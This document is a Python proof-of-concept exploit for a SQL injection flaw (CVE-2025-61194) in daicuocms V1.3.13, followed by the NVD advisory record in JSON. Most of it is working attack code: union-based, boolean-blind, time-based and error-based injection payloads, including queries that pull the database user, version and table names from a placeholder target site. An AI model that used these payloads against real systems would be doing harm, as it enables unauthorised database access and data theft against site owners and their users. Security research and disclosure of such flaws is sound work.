CVE-2025-61194

# CVE-2025-61194 - daicuocms V1.3.13 SQL Injection PoC # Target file: library\think\db\Builder.php # Vulnerability: Unparameterized SQL query construction import requests TARGET_URL = "http://target-daicuocms-site.com" # Example 1: Basic SQL Injection via search parameter # The Builder.php fails to sanitize user input before constructing SQL queries payload_1 = { "keyword": "test' UNION SELECT 1,user(),database(),4,5,6-- " } response_1 = requests.get(f"{TARGET_URL}/index.php?s=search/index", params=payload_1) print("[*] Union-based injection response:") print(response_1.text[:500]) # Example 2: Boolean-based blind SQL injection # Test if the injection works by checking response differences def check_injection(url, param_name, param_value): # Normal request normal_resp = requests.get(url, params={param_name: param_value}) # Injection request with TRUE condition true_resp = requests.get(url, params={param_name: f"{param_value}' AND 1=1-- "}) # Injection request with FALSE condition false_resp = requests.get(url, params={param_name: f"{param_value}' AND 1=2-- "}) if true_resp.text != false_resp.text and true_resp.text == normal_resp.text: print(f"[+] SQL Injection confirmed at parameter: {param_name}") return True return False # Example 3: Time-based blind SQL injection import time def time_based_injection(url, param_name, param_value): start_time = time.time() payload = f"{param_value}' AND SLEEP(5)-- " requests.get(url, params={param_name: payload}) elapsed = time.time() - start_time if elapsed >= 5: print(f"[+] Time-based SQL Injection confirmed! Delay: {elapsed:.2f}s") return True return False # Example 4: Extracting database version via error-based injection payload_error = { "id": "1' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT version()), 0x7e))-- " } response_error = requests.get(f"{TARGET_URL}/index.php?s=article/detail", params=payload_error) print("[*] Error-based injection response:") print(response_error.text[:500]) # Example 5: Extracting table names payload_tables = { "keyword": "test' UNION SELECT group_concat(table_name),2,3,4,5 FROM information_schema.tables WHERE table_schema=database()-- " } response_tables = requests.get(f"{TARGET_URL}/index.php?s=search/index", params=payload_tables) print("[*] Table extraction response:") print(response_tables.text[:500])

{"cve": {"id": "CVE-2025-61194", "sourceIdentifier": "[email protected]", "published": "2025-10-21T16:15:38.663", "lastModified": "2025-10-23T12:34:57.557", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "daicuocms V1.3.13 contains a SQL injection vulnerability in the file library\\think\\db\\Builder.php."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:daicuo:daicuo:1.3.13:*:*:*:*:*:*:*", "matchCriteriaId": "955C183A-BCCB-426E-9E29-429EA6B48DD6"}]}]}], "references": [{"url": "https://github.com/wzy-most/zeyu-Wang/blob/main/sql/readme.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}